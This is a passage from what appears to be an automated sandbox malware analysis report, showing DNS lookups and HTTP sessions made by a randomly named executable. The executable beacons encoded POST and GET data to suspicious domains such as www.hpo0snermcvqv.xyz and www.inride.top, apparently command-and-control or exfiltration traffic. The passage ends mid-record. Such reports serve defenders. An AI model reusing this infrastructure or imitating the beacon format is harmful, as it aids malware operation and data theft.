Aug 2, 2024 13:42:46.578206062 CEST	53	52975	1.1.1.1	192.168.2.4
Aug 2, 2024 13:43:00.593451023 CEST	57115	53	192.168.2.4	1.1.1.1
Aug 2, 2024 13:43:01.239826918 CEST	53	57115	1.1.1.1	192.168.2.4
Aug 2, 2024 13:43:17.250061989 CEST	63875	53	192.168.2.4	1.1.1.1
Aug 2, 2024 13:43:17.770088911 CEST	53	63875	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 2, 2024 13:41:13.752749920 CEST	192.168.2.4	1.1.1.1	0x344e	Standard query (0)	www.rotaprefabrik.online	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:41:34.798878908 CEST	192.168.2.4	1.1.1.1	0x66e1	Standard query (0)	www.hpo0snermcvqv.xyz	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:41:48.309276104 CEST	192.168.2.4	1.1.1.1	0x622	Standard query (0)	www.sdrynwhuf13.sbs	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:41:56.415199995 CEST	192.168.2.4	1.1.1.1	0x71df	Standard query (0)	www.inride.top	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:42:10.134658098 CEST	192.168.2.4	1.1.1.1	0x18ca	Standard query (0)	www.inbet.company	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:42:18.333436966 CEST	192.168.2.4	1.1.1.1	0x549f	Standard query (0)	www.15827f0ea96ee84a.com	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:42:32.482949972 CEST	192.168.2.4	1.1.1.1	0xb81f	Standard query (0)	www.baseinvestments.site	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:42:46.124473095 CEST	192.168.2.4	1.1.1.1	0xaa9a	Standard query (0)	www.techcadweb.tech	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:43:00.593451023 CEST	192.168.2.4	1.1.1.1	0xb189	Standard query (0)	www.eastcoastev.site	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:43:17.250061989 CEST	192.168.2.4	1.1.1.1	0xb0c3	Standard query (0)	www.cooperativas.lat	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 2, 2024 13:41:13.858853102 CEST	1.1.1.1	192.168.2.4	0x344e	No error (0)	www.rotaprefabrik.online	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2024 13:41:13.858853102 CEST	1.1.1.1	192.168.2.4	0x344e	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2024 13:41:13.858853102 CEST	1.1.1.1	192.168.2.4	0x344e	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:41:34.828028917 CEST	1.1.1.1	192.168.2.4	0x66e1	No error (0)	www.hpo0snermcvqv.xyz		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:41:34.828028917 CEST	1.1.1.1	192.168.2.4	0x66e1	No error (0)	www.hpo0snermcvqv.xyz		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:41:48.321151972 CEST	1.1.1.1	192.168.2.4	0x622	Name error (3)	www.sdrynwhuf13.sbs	none	none	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:41:56.685769081 CEST	1.1.1.1	192.168.2.4	0x71df	No error (0)	www.inride.top		162.254.38.5	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:42:10.157426119 CEST	1.1.1.1	192.168.2.4	0x18ca	Name error (3)	www.inbet.company	none	none	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:42:18.750174046 CEST	1.1.1.1	192.168.2.4	0x549f	No error (0)	www.15827f0ea96ee84a.com	zhuancdn.pternistes.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2024 13:42:18.750174046 CEST	1.1.1.1	192.168.2.4	0x549f	No error (0)	zhuancdn.pternistes.com		103.71.177.176	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:42:18.750174046 CEST	1.1.1.1	192.168.2.4	0x549f	No error (0)	zhuancdn.pternistes.com		103.21.91.100	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:42:32.691189051 CEST	1.1.1.1	192.168.2.4	0xb81f	No error (0)	www.baseinvestments.site	baseinvestments.site		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2024 13:42:32.691189051 CEST	1.1.1.1	192.168.2.4	0xb81f	No error (0)	baseinvestments.site		66.235.200.145	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:42:46.578206062 CEST	1.1.1.1	192.168.2.4	0xaa9a	No error (0)	www.techcadweb.tech	techcadweb.tech		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2024 13:42:46.578206062 CEST	1.1.1.1	192.168.2.4	0xaa9a	No error (0)	techcadweb.tech		162.241.148.243	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:43:01.239826918 CEST	1.1.1.1	192.168.2.4	0xb189	No error (0)	www.eastcoastev.site		103.42.108.46	A (IP address)	IN (0x0001)	false
Aug 2, 2024 13:43:17.770088911 CEST	1.1.1.1	192.168.2.4	0xb0c3	No error (0)	www.cooperativas.lat	cooperativas.lat		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2024 13:43:17.770088911 CEST	1.1.1.1	192.168.2.4	0xb0c3	No error (0)	cooperativas.lat		162.241.75.234	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.rotaprefabrik.online

www.hpo0snermcvqv.xyz

www.inride.top

www.15827f0ea96ee84a.com

www.baseinvestments.site

www.techcadweb.tech

www.eastcoastev.site

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	85.159.66.93	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:41:13.899024963 CEST	517	OUT	GET /rr50/?AV=_ng4uzR8Zz&SXqH06e=2kOM/31TW1roA/W1co45WLRXgmahHcobiheM1q2t86GHiq/JR2HJqxRNoSYt1v1K2qoLuY73JnsiaWdINJegakBCvO0IhsrDF+fhoUhJ53IQt5p3geHx+pw= HTTP/1.1 Host: www.rotaprefabrik.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Aug 2, 2024 13:41:14.592142105 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 02 Aug 2024 11:41:14 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-02T11:41:19.4784014Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	188.114.96.3	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:41:34.865253925 CEST	791	OUT	POST /nxj8/ HTTP/1.1 Host: www.hpo0snermcvqv.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.hpo0snermcvqv.xyz Referer: http://www.hpo0snermcvqv.xyz/nxj8/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 204 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 45 6c 36 77 6d 64 4b 64 52 4e 36 33 78 30 6c 6f 31 61 35 51 54 6c 68 70 49 50 65 46 59 67 7a 6b 49 32 71 55 66 5a 77 48 4c 51 6d 61 65 4d 55 57 33 4c 4e 71 4f 6d 55 58 41 66 52 4f 2b 33 50 74 74 2f 2b 48 41 57 49 76 72 4f 33 2b 4a 74 62 6c 62 6d 44 63 63 47 35 75 56 70 66 30 75 51 37 4c 31 31 43 64 34 6c 31 66 73 69 49 6f 72 4c 61 6a 2b 69 6c 4a 67 61 4f 70 45 65 68 6a 42 4d 6f 76 31 6e 57 31 71 49 58 6f 33 41 71 6d 6c 59 44 75 48 35 34 36 79 30 4d 2f 5a 4d 6e 4c 39 35 67 6b 69 76 59 37 34 46 6e 41 51 34 69 42 74 38 45 62 44 71 38 56 2b 6b 4a 45 6f 72 4e 38 2f 57 34 2f 2f 51 3d 3d Data Ascii: SXqH06e=El6wmdKdRN63x0lo1a5QTlhpIPeFYgzkI2qUfZwHLQmaeMUW3LNqOmUXAfRO+3Ptt/+HAWIvrO3+JtblbmDccG5uVpf0uQ7L11Cd4l1fsiIorLaj+ilJgaOpEehjBMov1nW1qIXo3AqmlYDuH546y0M/ZMnL95gkivY74FnAQ4iBt8EbDq8V+kJEorN8/W4//Q==
Aug 2, 2024 13:41:35.570951939 CEST	679	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 02 Aug 2024 11:41:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: http://www.hpo0snermcvqv.xyz X-Powered-By: PHP/7.4.6 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afKhNZ2x2hEbKUp9FY%2F9hZNuB9bwRCLZEj8ssj5GH%2FgtfZmdvomLU3%2FxwkkF%2Fi7oOkYauxXT2bfAwP5%2FQ%2FcPG49aL7095iTG%2Fh20mjahCPMkYF0sLz%2BC6b2Y%2FlQC5Rd0YyoAFQLHmSo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8acdccb78cb27c8d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.96.3	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:41:37.448318958 CEST	811	OUT	POST /nxj8/ HTTP/1.1 Host: www.hpo0snermcvqv.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.hpo0snermcvqv.xyz Referer: http://www.hpo0snermcvqv.xyz/nxj8/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 224 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 45 6c 36 77 6d 64 4b 64 52 4e 36 33 33 58 74 6f 32 39 46 51 43 56 68 6f 55 66 65 46 57 41 7a 2f 49 32 75 55 66 59 30 70 4b 6c 32 61 64 73 6b 57 32 4b 4e 71 65 32 55 58 4c 2f 52 48 6a 6e 4f 76 74 2f 37 34 41 54 67 76 72 4f 6a 2b 4a 76 44 6c 61 58 44 54 63 57 35 73 4a 70 66 79 7a 41 37 4c 31 31 43 64 34 6c 68 68 73 69 51 6f 72 59 43 6a 2f 44 6c 4f 6a 61 4f 71 44 65 68 6a 54 38 6f 30 31 6e 58 69 71 49 6e 47 33 44 43 6d 6c 5a 7a 75 48 6f 34 35 35 30 4d 39 55 73 6d 56 37 34 4a 73 37 61 67 71 6c 31 6a 79 4e 72 57 45 73 36 56 42 53 62 64 43 73 6b 74 33 31 73 45 49 79 56 46 32 6b 64 48 2b 49 43 51 69 55 54 52 5a 64 6a 52 75 68 55 76 46 31 6a 38 3d Data Ascii: SXqH06e=El6wmdKdRN633Xto29FQCVhoUfeFWAz/I2uUfY0pKl2adskW2KNqe2UXL/RHjnOvt/74ATgvrOj+JvDlaXDTcW5sJpfyzA7L11Cd4lhhsiQorYCj/DlOjaOqDehjT8o01nXiqInG3DCmlZzuHo4550M9UsmV74Js7agql1jyNrWEs6VBSbdCskt31sEIyVF2kdH+ICQiUTRZdjRuhUvF1j8=
Aug 2, 2024 13:41:38.138837099 CEST	673	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 02 Aug 2024 11:41:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: http://www.hpo0snermcvqv.xyz X-Powered-By: PHP/7.4.6 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UzxRxlNKRL0hao2cx%2B0ZhVGRxRCDAORn2Pu0cQmtfUtJdLQWzf7ZPhLesmEbA7%2B%2FHX1uGDf6y%2Baf98nHKYbn7Yuu66og3r2mrrinWS4%2Bylp8FdT7cA52KAbTYzDCzJIxFZrh%2FJ2nFZ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8acdccc78ba072b6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	188.114.96.3	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:41:40.024821043 CEST	10893	OUT	POST /nxj8/ HTTP/1.1 Host: www.hpo0snermcvqv.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.hpo0snermcvqv.xyz Referer: http://www.hpo0snermcvqv.xyz/nxj8/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 10304 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 45 6c 36 77 6d 64 4b 64 52 4e 36 33 33 58 74 6f 32 39 46 51 43 56 68 6f 55 66 65 46 57 41 7a 2f 49 32 75 55 66 59 30 70 4b 6c 2b 61 64 66 63 57 33 70 6c 71 64 32 55 58 49 2f 52 43 6a 6e 4f 75 74 2f 44 38 41 54 73 67 72 49 76 2b 4a 4d 4c 6c 64 6c 37 54 54 57 35 73 52 70 66 33 75 51 37 61 31 31 53 5a 34 6c 78 68 73 69 51 6f 72 61 32 6a 34 53 6c 4f 6c 61 4f 70 45 65 68 56 42 4d 70 36 31 6e 4f 58 71 4a 54 34 33 79 69 6d 6c 35 6a 75 41 61 51 35 77 30 4d 37 61 4d 6d 64 37 34 56 6a 37 61 56 47 6c 32 2b 76 4e 73 2b 45 76 2f 38 31 42 37 74 34 35 79 30 6b 6f 50 30 33 72 30 78 6c 73 38 53 46 59 68 30 43 42 42 52 77 56 68 55 72 37 42 37 42 76 6d 47 33 66 65 50 49 73 35 4a 39 34 63 6c 36 44 44 69 68 76 2b 2f 64 51 50 54 39 42 7a 6d 44 55 69 42 37 6f 5a 4c 50 71 39 55 61 6e 56 4b 35 36 4b 57 4b 48 62 77 42 39 39 58 4d 68 39 30 69 44 7a 52 61 72 48 61 6f 6e 76 4c 47 47 55 2f 4a 71 39 51 37 52 45 63 71 52 30 78 65 64 76 7a 34 41 76 43 69 76 53 30 67 51 61 79 7a 31 38 4f 59 35 4b 6f 4e 4d 48 [TRUNCATED] Data Ascii: SXqH06e=El6wmdKdRN633Xto29FQCVhoUfeFWAz/I2uUfY0pKl+adfcW3plqd2UXI/RCjnOut/D8ATsgrIv+JMLldl7TTW5sRpf3uQ7a11SZ4lxhsiQora2j4SlOlaOpEehVBMp61nOXqJT43yiml5juAaQ5w0M7aMmd74Vj7aVGl2+vNs+Ev/81B7t45y0koP03r0xls8SFYh0CBBRwVhUr7B7BvmG3fePIs5J94cl6DDihv+/dQPT9BzmDUiB7oZLPq9UanVK56KWKHbwB99XMh90iDzRarHaonvLGGU/Jq9Q7REcqR0xedvz4AvCivS0gQayz18OY5KoNMHeZk4Qo8xJCPpOlAdy5EPCtcWB5WK2sf1Y31ge2/GJs/d0TMCkX6bJoOWavcjauYBVCJEtd/KOeeF1PsQcXDdU3bx9+EkKg/Wx6V9HioPZJmAS5XieV4YcsoOnJMWaWHjvQgsw5isMbmk8CB3GKHZIRmbomTNt0IXxrTKHKoPUMw42dYhl1FANi3eahGLjF4YzIosR3kcfNPXvlb1G8ft8L/qVZsqlTTce878QpvYJKnZJHduFgqFoGA/9hYQIMDTtcRDvsUJDUfEMzbmeVAUR+f3BvPwNyTb7avF9hHjcGndYlO3en4OEcQsLLfjHWD2Q08tYN1kstOefwnMoneRj25j552Nj1kjSUZS4TLO6XDR2ejeY5AQHR6ZNObBksBmbgGBKRpFYL3774mYHW0KhJCtyIzA2LGoI5l7wleOz+uHGJ972iON39uJqVgQffm06LkjgNBgQ7rGOGkepn7FjmxtwGZJ4GoHUUm3+hwIfrPloN1KovJwn0O0X6e/Vp6F2LKe0ix4+WAG9fxRv/EyM01Aqh+pjYqLbxa3qOYE8AuuxuPIF0nHza7dzIrb0f12+XRnpzPJf+UrwGgL0OofI0DjH1mgF+IC9AAV1TrqiznR4rxQkTarCk9h8j2TXEFJAA+tvWmPfidO9k/0uWC4sZoXl3rW05NngV [TRUNCATED]
Aug 2, 2024 13:41:40.779383898 CEST	667	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 02 Aug 2024 11:41:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: http://www.hpo0snermcvqv.xyz X-Powered-By: PHP/7.4.6 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cbdhbg8Z6iW%2Br6aQ85WHUGRVXTAiGZL%2BWgRDcHMdwHzv3XxcoWr8FKMbhVronEbltF%2B0sSecjX4hQ0ItfSIgL4TzcpH7J2X51H3ENM9khTPbmsfczNOGDq2icc51yRwoKU74A2HIyb4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8acdccd7996c4269-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	188.114.96.3	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:41:42.597862959 CEST	514	OUT	GET /nxj8/?SXqH06e=JnSQlo2AJaGm+nFT2qZSRg0fIOiYW2yRChe1TvEOMyeVSI4Rrbd3M1U4P44prWGvlp78DR0O0ozNIt3GVmTMd3t1XoLI1R7o2Qu96VhEkD058LDdwikyqZA=&AV=_ng4uzR8Zz HTTP/1.1 Host: www.hpo0snermcvqv.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Aug 2, 2024 13:41:43.270644903 CEST	665	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 02 Aug 2024 11:41:43 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: http://www.hpo0snermcvqv.xyz X-Powered-By: PHP/7.4.6 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78X1WMTg7jFP6YEqk2Zcb6WJzp8B3ZEFdrqhugc1KtDDCpfsivvcECapGbMnGYMAd4NPfBeqh5sacnqsDJnDVAyn0uvoxGiLP7zouGyWGg8nCriJzhZ0%2F%2FBEqyAgclcRqvDTknalPCM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8acdcce7bb8042f5-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	162.254.38.5	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:41:56.724178076 CEST	770	OUT	POST /pobq/ HTTP/1.1 Host: www.inride.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.inride.top Referer: http://www.inride.top/pobq/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 204 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 35 6a 74 35 64 30 30 66 77 2f 73 62 73 34 73 6a 77 55 76 43 77 68 74 66 70 75 41 67 6f 77 57 56 6d 58 64 63 72 79 63 42 6f 6a 45 67 66 4d 58 35 6b 7a 61 78 49 46 6e 48 33 32 7a 53 41 7a 33 4f 32 2b 65 4c 70 6c 4c 45 4c 65 54 4c 34 77 71 4d 71 33 55 77 49 76 42 79 47 73 4f 42 70 6a 6a 55 36 39 57 33 41 64 48 35 6d 45 47 4d 62 42 34 6f 39 72 32 64 2b 2f 51 4c 43 6c 49 53 47 39 55 36 65 4a 53 39 79 38 72 76 47 33 64 56 45 30 59 74 2f 70 47 4c 35 6e 75 6c 48 41 6e 71 32 63 51 53 35 6c 39 42 56 67 6b 74 56 30 67 5a 73 51 4e 35 6c 59 47 38 63 41 66 33 68 78 71 59 32 31 76 6a 59 51 3d 3d Data Ascii: SXqH06e=5jt5d00fw/sbs4sjwUvCwhtfpuAgowWVmXdcrycBojEgfMX5kzaxIFnH32zSAz3O2+eLplLELeTL4wqMq3UwIvByGsOBpjjU69W3AdH5mEGMbB4o9r2d+/QLClISG9U6eJS9y8rvG3dVE0Yt/pGL5nulHAnq2cQS5l9BVgktV0gZsQN5lYG8cAf3hxqY21vjYQ==
Aug 2, 2024 13:41:57.333375931 CEST	695	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:41:57 GMT Server: Apache Content-Length: 551 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div>... partial --> <script src="./script.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	162.254.38.5	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:41:59.307998896 CEST	790	OUT	POST /pobq/ HTTP/1.1 Host: www.inride.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.inride.top Referer: http://www.inride.top/pobq/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 224 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 35 6a 74 35 64 30 30 66 77 2f 73 62 75 62 6b 6a 6a 6a 44 43 6b 78 74 63 6d 4f 41 67 68 51 57 52 6d 58 52 63 72 33 6b 76 70 52 67 67 66 75 2f 35 32 69 61 78 4e 46 6e 48 76 47 7a 58 64 6a 32 43 32 2b 54 72 70 67 7a 45 4c 66 7a 4c 34 79 79 4d 71 45 4d 7a 49 2f 42 77 4f 4d 4f 51 6a 44 6a 55 36 39 57 33 41 64 44 44 6d 45 75 4d 61 77 49 6f 38 4b 32 65 7a 66 51 49 56 56 49 53 4c 64 55 2b 65 4a 53 55 79 35 4f 41 47 31 56 56 45 32 41 74 2f 34 47 55 79 6e 75 76 61 77 6e 37 7a 38 39 46 30 67 78 4a 62 41 73 44 64 6d 73 66 67 32 63 6a 30 70 6e 72 4f 41 37 45 38 32 6a 73 37 32 53 71 44 62 52 38 61 47 52 46 4d 54 71 46 58 5a 6d 57 30 74 67 4e 6d 62 6f 3d Data Ascii: SXqH06e=5jt5d00fw/sbubkjjjDCkxtcmOAghQWRmXRcr3kvpRggfu/52iaxNFnHvGzXdj2C2+TrpgzELfzL4yyMqEMzI/BwOMOQjDjU69W3AdDDmEuMawIo8K2ezfQIVVISLdU+eJSUy5OAG1VVE2At/4GUynuvawn7z89F0gxJbAsDdmsfg2cj0pnrOA7E82js72SqDbR8aGRFMTqFXZmW0tgNmbo=
Aug 2, 2024 13:41:59.909565926 CEST	695	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:41:59 GMT Server: Apache Content-Length: 551 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 